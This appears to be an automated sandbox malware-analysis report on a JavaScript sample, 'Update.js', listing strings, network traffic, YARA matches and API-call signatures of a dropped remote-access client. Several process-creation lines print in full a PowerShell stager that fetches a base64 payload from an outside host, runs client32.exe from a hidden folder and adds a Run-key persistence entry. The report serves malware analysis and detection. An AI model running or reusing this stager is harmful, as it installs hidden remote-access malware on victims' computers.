00000000.00000003.2212052812.000001D0CD046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
                                Source: wscript.exe, 00000000.00000003.2210442052.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213461332.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211630069.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213566215.000001D0CD192000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209113379.000001D0CD044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212871998.000001D0CD187000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215778459.000001D0CD30A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210931576.000001D0CD168000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2160028757.000001D0C9611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214379787.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210203440.000001D0CD043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213173128.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214676945.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211789508.000001D0CD18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210554221.000001D0CD16D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211353920.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213694902.000001D0CD040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215259651.000001D0CD30D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212052812.000001D0CD046000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213968827.000001D0CD2D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
                                Source: wscript.exe, 00000000.00000003.2210442052.000001D0CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213461332.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2208938952.000001D0CCCC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211630069.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155218710.000001D0C7F22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213566215.000001D0CD192000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2209113379.000001D0CD044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212871998.000001D0CD187000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215778459.000001D0CD30A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210931576.000001D0CD168000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214379787.000001D0CD04E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210203440.000001D0CD043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213173128.000001D0CD182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2214676945.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211789508.000001D0CD18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2210554221.000001D0CD16D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2211353920.000001D0CD04F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213694902.000001D0CD040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2215259651.000001D0CD30D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2212052812.000001D0CD046000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2213968827.000001D0CD2D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com
                                Source: wscript.exe, 00000000.00000003.2160355900.000001D0C75F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.comXX2
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                                Source: unknownHTTPS traffic detected: 8.39.147.104:443 -> 192.168.2.6:49718 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.161.172:443 -> 192.168.2.6:49733 version: TLS 1.2
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,11_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110335A0 GetClipboardFormatNameA,SetClipboardData,11_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,11_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110335A0 GetClipboardFormatNameA,SetClipboardData,13_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,13_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,11_2_11033320
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,11_2_110077A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,11_2_11114590
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,13_2_11114590
                                Source: Yara matchFile source: 11.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2518228905.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,11_2_111165C0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,13_2_111165C0

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: amsi64_2324.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: sslproxydump.pcap, type: PCAPMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Powershell drops PE file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLLJump to dropped file
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                                Wscript starts Powershell (via cmd or directly)
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11113190: GetKeyState,DeviceIoControl,keybd_event,11_2_11113190
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,11_2_1115EA00
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D900
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD33FD3B2D6_2_00007FFD33FD3B2D
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1107368011_2_11073680
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11029BB011_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110627B011_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110336D011_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1105180011_2_11051800
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1115F84011_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1102BD4011_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1101BCD011_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11087F5011_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11045E7011_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1101C11011_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_111640E011_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1116834511_2_11168345
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_111265B011_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1107043011_2_11070430
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1108074011_2_11080740
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1100892B11_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1101CF3011_2_1101CF30
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1116EE8B11_2_1116EE8B
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6F9FA98011_2_6F9FA980
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA23DB811_2_6FA23DB8
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6F9FDBA011_2_6F9FDBA0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA2392311_2_6FA23923
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA2491011_2_6FA24910
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA1D70F11_2_6FA1D70F
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6F9F176011_2_6F9F1760
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110627B013_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1108B2A013_2_1108B2A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1107368013_2_11073680
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110336D013_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1105180013_2_11051800
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1115F84013_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11029BB013_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1102BD4013_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1101BCD013_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11087F5013_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11045E7013_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1101C11013_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_111640E013_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1116834513_2_11168345
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1108074013_2_11080740
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1100892B13_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1111C99013_2_1111C990
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1105C8A013_2_1105C8A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11116F3013_2_11116F30
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1101CF3013_2_1101CF30
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 6FA19480 appears 33 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 11164ED0 appears 64 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 110B7EF0 appears 35 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 1105E820 appears 628 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 1105E950 appears 59 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 6FA07A90 appears 36 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 111744C6 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 6F9F6F50 appears 112 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 11029A70 appears 2053 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 11161299 appears 88 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 11027F40 appears 94 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 11147060 appears 1202 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 6F9F30A0 appears 37 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 6FA07D00 appears 81 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 11147AD0 appears 47 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 11081E70 appears 90 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 1109DCE0 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: String function: 1116FED0 appears 71 times
                                Source: Update.jsInitial sample: Strings found which are bigger than 50
                                Source: amsi64_2324.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: sslproxydump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: classification engineClassification label: mal100.rans.troj.expl.evad.winJS@9/27@3/5
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1105A760 GetLastError,FormatMessageA,LocalFree,11_2_1105A760
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,11_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,11_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,13_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,13_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,11_2_11116880
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11089430 FindResourceA,LoadResource,LockResource,11_2_11089430
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,11_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1616:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0olerwg.b0i.ps1Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; 